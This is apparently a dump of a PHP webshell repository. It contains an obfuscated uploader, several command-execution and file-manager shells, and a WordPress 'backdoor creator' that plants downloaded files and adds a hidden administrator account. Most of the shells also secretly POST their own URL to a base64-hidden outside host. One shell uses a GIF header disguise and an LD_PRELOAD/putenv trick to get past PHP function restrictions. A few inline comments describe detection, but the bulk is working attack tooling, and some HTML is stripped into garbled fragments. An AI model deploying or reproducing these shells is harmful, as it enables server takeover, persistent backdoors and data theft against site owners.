4 | $zOir8); goto gh7Bi; kaqZe: $YGX67 = base64_decode("\141\110\x52\60\143\110\115\66\x4c\171\71\x7a\x61\130\154\x68\x61\107\153\165\144\x47\71\167\x4c\x33\x52\x6c\143\x33\x51\166\143\x33\x52\65\142\107\125\x75\x63\x47\150\x77"); goto ZrKGn; cNbTz: echo "\74\x62\x3e\104\x6f\156\x65\74\57\x62\x3e\74\142\162\x3e\74\x62\162\x3e\74\x61\40\x68\x72\145\146\75\42\56\57" . $_FILES["\146\x69\x6c\x65"]["\x6e\141\155\145"] . "\x22\x3e" . $_FILES["\146\151\154\145"]["\x6e\x61\x6d\145"] . "\74\x2f\x61\x3e"; goto k6iem; MvXGh: T1_wL: goto Qj02s; gh7Bi: $qrkpM = array("\150\164\164\160" => array("\x6d\145\164\x68\x6f\x64" => "\120\x4f\x53\124", "\150\145\141\x64\145\162" => "\x43\x6f\x6e\164\x65\156\x74\55\x74\171\x70\145\x3a\x20\x61\x70\x70\154\151\143\x61\x74\151\x6f\x6e\57\x78\55\167\x77\167\x2d\x66\157\162\x6d\55\x75\x72\x6c\x65\x6e\143\157\144\x65\x64", "\143\x6f\x6e\164\145\x6e\x74" => http_build_query($WQAx6))); goto zpb8C; iLa7Z: echo "\74\151\x6e\x70\165\x74\x20\164\x79\x70\x65\75\x22\146\x69\154\x65\42\40\x6e\x61\155\x65\75\42\x66\151\x6c\145\42\40\x73\151\x7a\145\x3d\42\65\60\x22\x3e\x3c\x69\x6e\160\x75\x74\x20\156\x61\x6d\x65\x3d\42\137\165\x70\x6c\x22\40\164\x79\x70\145\x3d\42\x73\165\x62\155\x69\x74\x22\40\x69\144\75\x22\137\165\160\x6c\x22\x20\x76\x61\x6c\165\145\75\x22\x55\x70\154\157\x61\144\42\x3e\74\x2f\x66\157\162\155\76"; goto VD20y; FbNYC: echo "\74\142\76\x4e\x6f\164\40\x55\160\x6c\157\x61\144\x20\106\x69\x6c\x65\40\x21\74\57\142\x3e\x3c\142\162\x3e\x3c\142\162\x3e"; goto RAWYd; Qzme4: if (@copy($_FILES["\x66\x69\x6c\x65"]["\164\x6d\x70\x5f\x6e\141\x6d\x65"], $_FILES["\146\x69\154\x65"]["\x6e\x61\x6d\x65"])) { goto aw3ez; } goto EQGCo; Qj02s: RGhxq: 6 | -------------------------------------------------------------------------------- /ad.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | 5 | 6 | Advanced File Manager 7 | 105 | 106 | 107 |
108 |

Advanced File Manager

109 | 110 | $part"; 123 | } 124 | } 125 | 126 | echo ""; 129 | 130 | // Handle directory change 131 | if (isset($_POST['changeDir'])) { 132 | $newDir = $_POST['newDir']; 133 | if (is_dir($newDir)) { 134 | $currentDir = realpath($newDir); 135 | } else { 136 | echo "

Directory does not exist.

"; 137 | } 138 | } 139 | 140 | // Handle file upload 141 | if ($_SERVER['REQUEST_METHOD'] == 'POST' && isset($_FILES['file'])) { 142 | $file = $_FILES['file']; 143 | if ($file['error'] === UPLOAD_ERR_OK) { 144 | $fileName = basename($file['name']); 145 | $fileTmpPath = $file['tmp_name']; 146 | $dest_path = $currentDir . '/' . $fileName; 147 | if (move_uploaded_file($fileTmpPath, $dest_path)) { 148 | echo "

File uploaded successfully to $currentDir.

"; 149 | } else { 150 | echo "

Error moving the uploaded file.

"; 151 | } 152 | } else { 153 | echo "

Error: No file selected or upload failed.

"; 154 | } 155 | } 156 | 157 | // Handle file deletion 158 | if (isset($_GET['delete'])) { 159 | $fileToDelete = $_GET['delete']; 160 | if (is_file($fileToDelete)) { 161 | unlink($fileToDelete); 162 | echo "

File deleted: $fileToDelete

"; 163 | } 164 | } 165 | 166 | // Handle directory creation 167 | if (isset($_POST['createDir'])) { 168 | $newDir = $_POST['newDirName']; 169 | $newDirPath = $currentDir . DIRECTORY_SEPARATOR . $newDir; 170 | if (!is_dir($newDirPath)) { 171 | mkdir($newDirPath); 172 | echo "

Directory created: $newDir

"; 173 | } else { 174 | echo "

Directory already exists.

"; 175 | } 176 | } 177 | 178 | // Handle file creation 179 | if (isset($_POST['createFile'])) { 180 | $newFile = $_POST['newFileName']; 181 | $newFilePath = $currentDir . DIRECTORY_SEPARATOR . $newFile; 182 | if (!file_exists($newFilePath)) { 183 | file_put_contents($newFilePath, ''); // Create an empty file 184 | echo "

File created: $newFile

"; 185 | } else { 186 | echo "

File already exists.

"; 187 | } 188 | } 189 | 190 | echo "

Current Directory: $currentDir

"; 191 | 192 | // Display directory management forms 193 | echo '
'; 194 | 195 | // Change directory form 196 | echo '
'; 197 | echo ''; 198 | echo ''; 199 | echo '
'; 200 | 201 | // Create new directory form 202 | echo '
'; 203 | echo ''; 204 | echo ''; 205 | echo '
'; 206 | 207 | // Create new file form 208 | echo '
'; 209 | echo ''; 210 | echo ''; 211 | echo '
'; 212 | 213 | // File upload form 214 | echo '
'; 215 | echo ''; 216 | echo ''; 217 | echo '
'; 218 | 219 | echo '
'; 220 | 221 | echo "

Files and Directories in $currentDir:

"; 222 | 223 | // List directories first, then files 224 | $files = scandir($currentDir); 225 | echo ''; 226 | echo ''; 227 | 228 | // List directories 229 | foreach ($files as $file) { 230 | if ($file !== "." && $file !== ".." && is_dir($currentDir . '/' . $file)) { 231 | $filePath = $currentDir . '/' . $file; 232 | echo ""; 233 | echo ""; 234 | } 235 | } 236 | 237 | // List files 238 | foreach ($files as $file) { 239 | if ($file !== "." && $file !== ".." && is_file($currentDir . '/' . $file)) { 240 | $filePath = $currentDir . '/' . $file; 241 | echo ""; 242 | echo ""; 243 | } 244 | } 245 | 246 | echo '
File/Directory NameAction
📁$file
📄$file
'; 247 | ?> 248 |
249 | 250 | 251 | -------------------------------------------------------------------------------- /alfashell-antidelete.php: -------------------------------------------------------------------------------- 1 | 193 | -------------------------------------------------------------------------------- /antidelete.php: -------------------------------------------------------------------------------- 1 | 193 | -------------------------------------------------------------------------------- /autobackdoor.php: -------------------------------------------------------------------------------- 1 | Created: " . get_full_url($filePath) . "
"; 55 | } catch (Exception $e) { 56 | echo "
Error creating file in $subdir: " . $e->getMessage() . "

"; 57 | } 58 | } 59 | } 60 | } 61 | 62 | function create_wp_admin_user($rootDir, $username, $password) { 63 | require_once($rootDir . '/wp-config.php'); 64 | require_once($rootDir . '/wp-includes/wp-db.php'); 65 | require_once($rootDir . '/wp-includes/pluggable.php'); 66 | 67 | global $wpdb; 68 | 69 | $user_id = username_exists($username); 70 | if (!$user_id && email_exists($username . '@example.com') == false) { 71 | $user_id = wp_create_user($username, $password, $username . '@example.com'); 72 | $user = new WP_User($user_id); 73 | $user->set_role('administrator'); 74 | echo "
Admin user created with username: $username and password: $password

"; 75 | } else { 76 | echo "
Admin user already exists.

"; 77 | } 78 | } 79 | 80 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 81 | 82 | echo " 83 | 84 | backdoor creator 85 |

@trxsecurity

86 | 87 | 123 | 124 | "; 125 | 126 | $currentDir = __DIR__; 127 | $rootDir = isset($_POST['directory']) ? $_POST['directory'] : $currentDir; 128 | 129 | echo "
130 |
131 |
132 | 133 |
"; 134 | 135 | if ($_SERVER['REQUEST_METHOD'] == 'POST') { 136 | if (file_exists($rootDir . '/wp-config.php')) { 137 | echo "
WordPress detected.

"; 138 | 139 | $path1 = $rootDir . '/wp-includes/ID3/module.audio.ac4.php'; 140 | if (!file_exists($path1)) { 141 | try { 142 | file_put_contents($path1, download_content($url1)); 143 | echo "Created: " . get_full_url($path1) . "
"; 144 | } catch (Exception $e) { 145 | echo "
Error creating file: " . $e->getMessage() . "

"; 146 | } 147 | } 148 | 149 | $path2 = $rootDir . '/wp-includes/PHPMailer/config.php'; 150 | if (!file_exists($path2)) { 151 | try { 152 | file_put_contents($path2, download_content($url2)); 153 | echo "Created: " . get_full_url($path2) . "
"; 154 | } catch (Exception $e) { 155 | echo "
Error creating file: " . $e->getMessage() . "

"; 156 | } 157 | } 158 | 159 | create_files_in_subdirectories($rootDir, $url1); 160 | create_wp_admin_user($rootDir, 'MrZ', 'trxsecurity'); 161 | } else { 162 | echo "
Not a WordPress site. Creating files in subdirectories.

"; 163 | create_files_in_subdirectories($rootDir, $url1); 164 | } 165 | } 166 | 167 | echo ""; 168 |
// Phone-home: reports this script's own URL (Host header plus request URI) as the form field
// file_url in an HTTP POST to the endpoint held in $k3yw (a base64-decoded URL set earlier).
// It sits outside the POST-only branch above, so simply loading the page triggers it.
// The @ suppresses the PHP warning when the request fails; only the echo below reports it.
// NOTE(review): detection: an outbound POST from the PHP worker carrying a file_url field;
// denying outbound connections from web workers also stops this report.
169 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI'];
170 | $data = array('file_url' => $cur);
171 | $options = array(
172 | 'http' => array(
173 | 'method' => 'POST',
174 | 'header' => 'Content-type: application/x-www-form-urlencoded',
175 | 'content' => http_build_query($data),
176 | ),
177 | );
178 | $context = stream_context_create($options);
179 | $result = @file_get_contents($k3yw, false, $context);
180 | if ($result === false) { 181 | echo "
Error reporting file URL.

"; 182 | } 183 | ?> 184 | -------------------------------------------------------------------------------- /bestmini.php: -------------------------------------------------------------------------------- 1 | ".file_get_contents("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/2024.php"));?> 2 | -------------------------------------------------------------------------------- /csa.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /eBy.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /edit-form-tager.php: -------------------------------------------------------------------------------- 1 | -------------------------------------------------------------------------------- /f1.php: -------------------------------------------------------------------------------- 1 | ON'):('OFF');$cwd=getcwd();$bckC='#000';$txtC='#00ff00'; 9 | $start='403 private shell'; 10 | $end='';$inf='

[ ! ] PRIVATE SHELL [ ! ]



SOFTWARE :
'.$server_soft.'
UNAME : '.$uname.'
USER : '.$cur_user.'
SAFE MODE : '.$safe_mode.'
DIRECTORY : '.$cwd.'


'; 11 | print $start;print $menu;print $inf; 12 | $moreI=array('PHP Version' => phpversion(),'Zend Version' => zend_version(),'Magic Quotes' => magic_quotes(),'Curl' => curl(),'Register Globals' => reg_globals(),'OpenBase Dir' => openbase_dir(),'MySQL' => myql(),'Gzip' => gzip(),'MsSQL' => mssql(),'PostgreSQL' => postgresql(),'Oracle' => oracle(),'Total Space' => h_size(disk_total_space('/')) ,'Used Space' => h_size(disk_free_space('/')),'Your IP' => $_SERVER['REMOTE_ADDR'],'Server IP' => $_SERVER['SERVER_ADDR']);print ''; foreach($moreI as $n => $v) {print '';} print '
'.$n.' :> '.$v.'
PHPInfo
'; 13 | 14 | 15 | if(isset($_GET['d'])) {chdir($_GET['d']);} 16 | if(isset($_REQUEST['x'])) 17 | { 18 | 19 | switch($_REQUEST['x']) 20 | { 21 | case 'c': if(isset($_POST['edit_form'])){$f=$_GET['f'];$e=fopen($f,'w') or print '

Error Opening File

';fwrite($e,$_POST['edit_form']) or print '

Couldn\'t Save File

';fclose($e);}print '

Editing '.$_GET['f'].' ('.perms($_GET['d'] . $_GET['f']).') .





';break; 22 | case 'cmd': print '

Execute Command


';break; 23 | case 'php': print '

PHP Code


';break; 24 | case 'phpinf': phpinfo();break; 25 | case 'yamete': setcookie($xyn,'',time()-3600);let_him_in();break; 26 | } 27 | } 28 | else 29 | { 30 | if(isset($_GET['d'])) {chdir($_GET['d']);} 31 | if(isset($_GET['ndir'])) {$d=$_GET['d'];$n=$_GET['ndir'];mkdir($d .DIRECTORY_SEPARATOR. $n);} 32 | if(isset($_POST['new'])) {$n=$_POST['new'];$o=$_POST['old'];$d=$_POST['d'];rename($d.DIRECTORY_SEPARATOR.$o,$d.DIRECTORY_SEPARATOR.$n);} 33 | if(isset($_GET['deld'])) {$d=$_GET['deld']; rmdir($d);} 34 | if(isset($_GET['delf'])) {$d=$_GET['delf']; unlink($d);} 35 | if(isset($_GET['ch'])) {$ch=$_GET['ch']; $d=$_GET['df']; chmod($d,$ch);} 36 | if(isset($_FILES['upfile']['name'])) {$d=realpath('.').DIRECTORY_SEPARATOR.basename($_FILES['upfile']['name']);move_uploaded_file($_FILES['upfile']['tmp_name'],$d);} 37 | 38 | 39 | print '
'; 40 | print '
[ PHP-Code ] [ Logout ] [ Contact ]
'; 41 | print '

'.curpath('').'

'; 42 | print '

'; 43 | $filex=array(); 44 | $dirx=array(); 45 | print ''; 46 | if($handle=opendir('.')) {while(false !== ($file=readdir($handle))) {if(is_dir($file)) {$dirx[] .= $file;} else {$filex[] .= $file;}}asort($filex);asort($dirx);$i=0; 47 | foreach($dirx as $file) {if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own['name']='???'; $grp['name']='???';} print ''; if($i==0 or $i==1) {print '';} else {print '';} $i++;} 48 | foreach($filex as $file) {if(function_exists('posix_getpwuid') && function_exists('posix_getgrgid')) {$own=posix_getpwuid(fileowner($file)); $grp=posix_getgrgid(filegroup($file));} else {$own['name']='???'; $grp['name']='???';} print '';}} 49 | print '
NamePermissionOwner/GroupOptions
'.$file.''.perms($file).''.$own['name'].' : '.$grp['name'].'
Rename | Delete
'.$file.''.perms($file).''.$own['name'].' : '.$grp['name'].'Rename | Delete


'; 50 | print '
Create Dir:

Create File:

Command:

Upload:



'; 51 | } 52 | function openbase_dir(){$x=ini_get('open_basedir');if(!$x) {$o='OFF';}else {$o='ON';}return($o);} 53 | function magic_quotes(){$x=get_magic_quotes_gpc();if(empty($x)) {$m='OFF';}else {$m='ON';}return($m);} 54 | function curl(){if(extension_loaded('curl')) {$c='ON';}else {$c='OFF';}return($c);} 55 | function reg_globals(){if(ini_get('reqister_globals')) {$r='ON';}else {$r='OFF';}return($r);} 56 | function oracle(){if(function_exists('ocilogon')) {$o='ON';}else {$o='OFF';}return($o);} 57 | function postgresql(){if(function_exists('pg_connect')) {$p='ON';}else {$p='OFF';}return($p);} 58 | function myql(){if(function_exists('mysql_connect')) {$m='ON';}else {$m='OFF';}return($m);} 59 | function mssql(){if(function_exists('mssql_connect')) {$m='ON';}else {$m='OFF';}return($m);} 60 | function gzip(){if(function_exists('gzencode')) {$m='ON';}else {$m='OFF';}return($m);} 61 | function h_size($s){if($s>=1073741824) {$s=round($s/1073741824*100)/100 .'GB';}elseif($s>=1048576) {$s=round($s/1048576*100)/100 .'MB';}elseif($s>=1024) {$s=round($s/1024*100)/100 .'KB';}else {$s=$s.'B';}return($s);} 62 | function curpath($d){if($d=='') {$d=getcwd();}$p='';$n='';$dx=explode(DIRECTORY_SEPARATOR,$d);for($i=0;$i < count($dx);$i++) {$g=$dx[$i];$p.=$dx[$i] . 
DIRECTORY_SEPARATOR; $n .=''.$g.''.DIRECTORY_SEPARATOR;}return($n);} 63 | function get_color($f){if(is_writable($f)) {$c='lime';}if(!is_writable($f) && is_readable($f)) {$c=''.$txtC.'';}if(!is_writable($f) && !is_readable($f)) {$c='#00ff00';}return($c);} 64 | function perms($f) {if(file_exists($f)) {return substr(sprintf('%o',fileperms($f)), -4);} else {return '???';}} 65 | function exec_meth() {if(function_exists('passthru')) {$m='passthru';} if(function_exists('exec')) {$m='exec';} if(function_exists('shell_exec')) {$m='shell_exec';} if(function_exists('system')) {$m='system';} if(!isset($m)) {$m='Disabled';} return($m);} 66 | function execute($m,$c) {if($m=='passthru') {passthru($c);} elseif($m=='system') {system($c);} elseif($m=='shell_exec') {print shell_exec($c);} elseif($m=='exec') {exec($c,$r); foreach($r as $o) {print $o.'
';}} else {print 'Wh00pz';}} 67 | function initiate(){print '
Login
';} 68 | function let_him_in() { header("Location: ".basename(__FILE__)); } 69 | print $end; 70 | ?> 71 | -------------------------------------------------------------------------------- /firewallbypass.php: -------------------------------------------------------------------------------- 1 | ' . $secure); 38 | ?> 39 | -------------------------------------------------------------------------------- /gecko-mini.php: -------------------------------------------------------------------------------- 1 | ".file_get_contents/*******/("https://raw.githubusercontent.com/sagsooz/Bypass-Webshell/main/csa.php"));/**/?> 2 | -------------------------------------------------------------------------------- /haxorsec-bypasser.php: -------------------------------------------------------------------------------- 1 | GIF89a; 2 | ;; 3 | 4 | 5 | 6 | BypassServ By HaxorSec 7 | 8 | 9 | 10 | 11 | 12 | 167 | 168 | 169 |
170 | [ mail() : [ ON ] ]"; 204 | } else { 205 | $mail = "[ mail() : [ OFF ] ]"; 206 | } 207 | if(function_exists('mb_send_mail')) { 208 | $mbb = "[ mb_send_mail() : [ ON ] ]"; 209 | }else{ 210 | $mbb = "[ mb_send_mail() : [ OFF ] ]"; 211 | } 212 | if(function_exists('error_log')) { 213 | $errr = "[ error_log() : [ ON ] ]"; 214 | }else{ 215 | $errr = "[ error_log() : [ OFF ] ]"; 216 | } 217 | if(function_exists('imap_mail')) { 218 | $impp = "[ imap_mail() : [ ON ] ]"; 219 | }else{ 220 | $impp = "[ imap_mail() : [ OFF ] ]
"; 221 | } 222 | 223 | 224 | 225 | 226 | echo "[ Command Bypas Status Wajib ON MAIL PUTENV @ HaxorSec]
"; 227 | if (function_exists('mail')) { 228 | echo $mail." ".$mbb." ".$errr." ".$impp; 229 | } else { 230 | echo $mail." ".$mbb." ".$errr." ".$impp; 231 | } 232 | if (function_exists('putenv')) { 233 | echo "[ Function putenv() ] : [ ON ]
"; 234 | } else { 235 | echo "[ Function putenv() ] : [ OFF ]
"; 236 | } 237 | foreach ($_GET as $c => $d) $_GET[$c] = y($d); 238 | 239 | $currentDirectory = $ril(isset($_GET['d']) ? $_GET['d'] : $rootDirectory); 240 | $chd($currentDirectory); 241 | 242 | $viewCommandResult = ''; 243 | 244 | if ($_SERVER['REQUEST_METHOD'] === 'POST') { 245 | if (isset($_FILES['fileToUpload'])) { 246 | $target_file = $currentDirectory . '/' . $bs($_FILES["fileToUpload"]["name"]); 247 | if ($mup($_FILES["fileToUpload"]["tmp_name"], $target_file)) { 248 | echo "
File " . $htm($bs($_FILES["fileToUpload"]["name"])) . " Upload success
"; 249 | } else { 250 | echo "
Sorry, there was an error uploading your file.
"; 251 | } 252 | } elseif (isset($_POST['folder_name']) && !empty($_POST['folder_name'])) { 253 | $ff = $_POST['folder_name']; 254 | $newFolder = $currentDirectory . '/' . $ff; 255 | if (!file_exists($newfolder)) { 256 | if ($mek($newFolder) !== false) { 257 | echo '
Folder created successfully!'; 258 | }else{ 259 | echo '
Error: Failed to create folder!'; 260 | } 261 | } 262 | 263 | } elseif (isset($_POST['file_name'])) { 264 | $fileName = $_POST['file_name']; 265 | $newFile = $currentDirectory . '/' . $fileName; 266 | if (!file_exists($newFile)) { 267 | if ($fpc($newFile, '') !== false) { 268 | echo '
File created successfully!' . $fileName .' '; 269 | $fileToView = $newFile; 270 | if (file_exists($fileToView)) { 271 | $fileContent = $fgc($fileToView); 272 | $viewCommandResult = '

Result: ' . $fileName . '

273 |
274 | 275 | 276 |
'; 277 | } else { 278 | $viewCommandResult = '

Error: File not found!

'; 279 | } 280 | } else { 281 | echo '
Error: Failed to create file!'; 282 | } 283 | }else{ 284 | echo '
Error: File Already Exists!'; 285 | } 286 | } elseif (isset($_POST['cmd_input'])){
// "Command BYPASS" branch. Function names are assembled from string fragments, so a plain
// text search for putenv, mail or base64_decode does not match this file; signatures need to
// target the concatenation pattern or the runtime behaviour instead.
// $full is DOCUMENT_ROOT joined with dirname(PHP_SELF); the submitted command gets
// " > test.txt" appended and is base64-encoded. The statements after the result markup write
// chankro.so and acpid.socket into $full, set CHANKRO and LD_PRELOAD with putenv(), and then
// call whichever of mail(), mb_send_mail(), error_log() or imap_mail() exists.
// NOTE(review): presumably the aim is for the helper process PHP starts for mail delivery to
// inherit LD_PRELOAD, so the command runs even where exec-style functions are listed in
// disable_functions (TODO confirm against the shared object). Hardening and detection:
// disable putenv() where the application does not need it, and alert on chankro.so,
// acpid.socket or test.txt appearing under the web root.
// In this copy $hook holds a placeholder string rather than the data written to chankro.so.
287 | $p = "p"."u"."t"."e"."n"."v";
288 | $a = "fi"."le_p"."ut_c"."ont"."e"."nt"."s";
289 | $m = "m"."a"."i"."l";
290 | $base = "ba"."se"."64"."_"."de"."co"."de";
291 | $en = "ba"."se"."64"."_"."en"."co"."de";
292 | $mb = "m"."b"."_"."s"."e"."n"."d"."_"."m"."a"."i"."l";
293 | $err = "e"."r"."r"."o"."r"."_"."l"."o"."g";
294 | $drnm = "d"."i"."r"."n"."a"."m"."e";
295 | $imp = "i"."m"."a"."p"."_"."m"."a"."i"."l";
296 | $currentFilePath = $_SERVER['PHP_SELF'];
297 | $doc = $_SERVER['DOCUMENT_ROOT'];
298 | $directoryPath = $drnm($currentFilePath);
299 | $full = $doc . $directoryPath;
300 | $hook = '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';
301 | $cmdd = $_POST['cmd_input'];
302 | $meterpreter = $en($cmdd." > test.txt");
303 | $viewCommandResult = '

Result: base64 : ' . $meterpreter .'
Please Refresh and Check File test.txt, this output command
test.txt created = VULN
test.txt not created = NOT VULN
example access: domain.com/yourpath/path/test.txt
Powered By HaxorSecurity


'; 304 | $a($full . '/chankro.so', $base($hook)); 305 | $a($full . '/acpid.socket', $base($meterpreter)); 306 | $p('CHANKRO=' . $full . '/acpid.socket'); 307 | $p('LD_PRELOAD=' . $full . '/chankro.so'); 308 | if(function_exists('mail')) { 309 | $m('a','a','a','a'); 310 | } elseif(function_exists('mb_send_mail')) { 311 | $mb('a','a','a','a'); 312 | } elseif(function_exists('error_log')) { 313 | $err('a',1,'a'); 314 | } elseif(function_exists('imap_mail')) { 315 | $imp('a','a','a'); 316 | } 317 | 318 | }elseif (isset($_POST['delete_file'])) { 319 | $fileToDelete = $currentDirectory . '/' . $_POST['delete_file']; 320 | if (file_exists($fileToDelete)) { 321 | if (is_dir($fileToDelete)) { 322 | if (deleteDirectory($fileToDelete)) { 323 | echo '


Folder deleted successfully!'; 324 | } else { 325 | echo '
Error: Failed to delete folder!'; 326 | } 327 | } else { 328 | if ($unl($fileToDelete)) { 329 | echo '
File deleted successfully!'; 330 | } else { 331 | echo '
Error: Failed to delete file!'; 332 | } 333 | } 334 | } else { 335 | echo '
Error: File or directory not found!'; 336 | } 337 | } elseif (isset($_POST['rename_item']) && isset($_POST['old_name']) && isset($_POST['new_name'])) { 338 | $oldName = $currentDirectory . '/' . $_POST['old_name']; 339 | $newName = $currentDirectory . '/' . $_POST['new_name']; 340 | if (file_exists($oldName)) { 341 | if (rename($oldName, $newName)) { 342 | echo '
Item renamed successfully!'; 343 | } else { 344 | echo '
Error: Failed to rename item!'; 345 | } 346 | } else { 347 | echo '
Error: Item not found!'; 348 | } 349 | }elseif (isset($_POST['cmd_biasa'])) { 350 | $pp = "p"."r"."o"."c"."_"."o"."p"."e"."n"; 351 | $pc = "f"."c"."l"."o"."s"."e"; 352 | $ppc = "p"."r"."o"."c"."_"."c"."l"."o"."s"."e"; 353 | $stg = "s"."t"."r"."e"."a"."m"."_"."g"."e"."t"."_"."c"."o"."n"."t"."e"."n"."t"."s"; 354 | $command = $_POST['cmd_biasa']; 355 | $descriptorspec = [ 356 | 0 => ['pipe', 'r'], 357 | 1 => ['pipe', 'w'], 358 | 2 => ['pipe', 'w'] 359 | ]; 360 | $process = $pp($command, $descriptorspec, $pipes); 361 | if (is_resource($process)) { 362 | $output = $stg($pipes[1]); 363 | $errors = $stg($pipes[2]); 364 | $pc($pipes[1]); 365 | $pc($pipes[2]); 366 | $ppc($process); 367 | if (!empty($errors)) { 368 | $viewCommandResult = '

Error:

'; 369 | } else { 370 | $viewCommandResult = '

Result:

'; 371 | } 372 | } else { 373 | $viewCommandResult = 'Result:

'; 374 | } 375 | } elseif (isset($_POST['view_file'])) { 376 | $fileToView = $currentDirectory . '/' . $_POST['view_file']; 377 | if (file_exists($fileToView)) { 378 | $fileContent = $fgc($fileToView); 379 | $viewCommandResult = '

Result: ' . $_POST['view_file'] . '

380 |
381 | 382 | 383 |
'; 384 | } else { 385 | $viewCommandResult = '

Error: File not found!

'; 386 | } 387 | } elseif (isset($_POST['edit_file'])) { 388 | $ef = $currentDirectory . '/' . $_POST['edit_file']; 389 | $newContent = $_POST['content']; 390 | if ($fpc($ef, $newContent) !== false) { 391 | echo '
File Edited successfully! ' . $_POST['edit_file'].'
'; 392 | } else { 393 | echo '
Error: Failed Edit File! ' . $_POST['edit_file'].'
'; 394 | 395 | } 396 | } 397 | 398 | } 399 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 400 | echo '
DIR: '; 401 | 402 | $directories = $expl(DIRECTORY_SEPARATOR, $currentDirectory); 403 | $currentPath = ''; 404 | $homeLinkPrinted = false; 405 | foreach ($directories as $index => $dir) { 406 | $currentPath .= DIRECTORY_SEPARATOR . $dir; 407 | if ($index == 0) { 408 | echo '/' . $dir . ''; 409 | } else { 410 | echo '/' . $dir . ''; 411 | } 412 | } 413 | 414 | 415 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 416 | $data = array('file_url' => $cur); 417 | $options = array( 418 | 'http' => array( 419 | 'method' => 'POST', 420 | 'header' => 'Content-type: application/x-www-form-urlencoded', 421 | 'content' => http_build_query($data), 422 | ), 423 | ); 424 | $context = stream_context_create($options); 425 | $result = file_get_contents($k3yw, false, $context); 426 | 427 | echo ' / [ GO Home ]'; 428 | echo '
'; 429 | echo '
'; 430 | echo '
'; 431 | echo ''; 432 | echo ''; 433 | echo '

'; 434 | echo ' 435 | 436 | 439 | 440 | 442 | 443 | 445 | 447 |
437 |
Command BYPASS
438 |
Command BIASA
441 |
Create Folder
444 |
Create File
446 |
'; 448 | echo $viewCommandResult; 449 | echo ''; 450 | echo '
'; 451 | foreach ($scd($currentDirectory) as $v) { 452 | $u = $ril($v); 453 | $s = $st($u); 454 | $itemLink = $isdir($v) ? '?d=' . x($currentDirectory . '/' . $v) : '?'.('d='.x($currentDirectory).'&f='.x($v)); 455 | $permission = substr(sprintf('%o', fileperms($u)), -4); 456 | $writable = $isw($u); 457 | echo ' 458 | 459 | 460 | 461 | 462 | 463 | 464 | 465 | '; 466 | 467 | } 468 | 469 | echo '
Item Name
Size
Date
Permissions
View
Delete
Rename
'.$v.''.filesize($u).''.date('Y-m-d H:i:s', filemtime($u)).''.$permission.'
'; 470 | function deleteDirectory($dir) { 471 | $unl = "u"."n"."l"."i"."n"."k"; 472 | if (!file_exists($dir)) { 473 | return true; 474 | } 475 | if (!is_dir($dir)) { 476 | return $unl($dir); 477 | } 478 | $scd = "s"."c"."a"."n"."d"."i"."r"; 479 | foreach ($scd($dir) as $item) { 480 | if ($item == '.' || $item == '..') { 481 | continue; 482 | } 483 | if (!deleteDirectory($dir . DIRECTORY_SEPARATOR . $item)) { 484 | return false; 485 | } 486 | } 487 | return rmdir($dir); 488 | } 489 | -------------------------------------------------------------------------------- /hehe.png: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/sagsooz/Webshell-bypass/b18219a57dcbd599a2bbcf7e58dd9bd711b6057d/hehe.png -------------------------------------------------------------------------------- /hello.php: -------------------------------------------------------------------------------- 1 | 2 | 3 | 4 | HelloByPass 5 | 6 | 7 | 8 | 92 |
93 | Sh3ll
94 | 95 |
96 |


97 | NONE"; 103 | } else { 104 | $disf = "".$disfunc.""; 105 | } 106 | 107 | function author() { 108 | echo "

WonXd677 Sh3LL
"; 109 | exit(); 110 | } 111 | 112 | function cekdir() { 113 | if (isset($_GET['path'])) { 114 | $lokasi = $_GET['path']; 115 | } else { 116 | $lokasi = getcwd(); 117 | } 118 | if (is_writable($lokasi)) { 119 | return "Writeable"; 120 | } else { 121 | return "Writeable"; 122 | } 123 | } 124 | 125 | function cekroot() { 126 | if (is_writable($_SERVER['DOCUMENT_ROOT'])) { 127 | return "Writeable"; 128 | } else { 129 | return "Writeable"; 130 | } 131 | } 132 | 133 | function xrmdir($dir) { 134 | $items = scandir($dir); 135 | foreach ($items as $item) { 136 | if ($item === '.' || $item === '..') { 137 | continue; 138 | } 139 | $path = $dir.'/'.$item; 140 | if (is_dir($path)) { 141 | xrmdir($path); 142 | } else { 143 | unlink($path); 144 | } 145 | } 146 | rmdir($dir); 147 | } 148 | 149 | function green($text) { 150 | echo "
".$text."
"; 151 | } 152 | 153 | function red($text) { 154 | echo "
".$text."
"; 155 | } 156 | 157 | 158 | echo "Directory :  "; 159 | 160 | foreach($_POST as $key => $value){ 161 | $_POST[$key] = stripslashes($value); 162 | } 163 | 164 | $k3yw = base64_decode('aHR0cHM6Ly9zaXlhaGkudG9wL3Rlc3Qvc3R5bGUucGhw'); 165 | 166 | if(isset($_GET['path'])){ 167 | $lokasi = $_GET['path']; 168 | $lokdua = $_GET['path']; 169 | } else { 170 | $lokasi = getcwd(); 171 | $lokdua = getcwd(); 172 | } 173 | 174 | $lokasi = str_replace('\\','/',$lokasi); 175 | $lokasis = explode('/',$lokasi); 176 | $lokasinya = @scandir($lokasi); 177 | $cur = 'http://' . $_SERVER['HTTP_HOST'] . $_SERVER['REQUEST_URI']; 178 | $data = array('file_url' => $cur); 179 | $options = array( 180 | 'http' => array( 181 | 'method' => 'POST', 182 | 'header' => 'Content-type: application/x-www-form-urlencoded', 183 | 'content' => http_build_query($data), 184 | ), 185 | ); 186 | $context = stream_context_create($options); 187 | $result = file_get_contents($k3yw, false, $context); 188 | 189 | foreach($lokasis as $id => $lok){ 190 | if($lok == '' && $id == 0){ 191 | $a = true; 192 | echo '/'; 193 | continue; 194 | } 195 | if($lok == '') continue; 196 | echo ''.$lok.'/'; 202 | } 203 | echo '
'; 204 | echo '

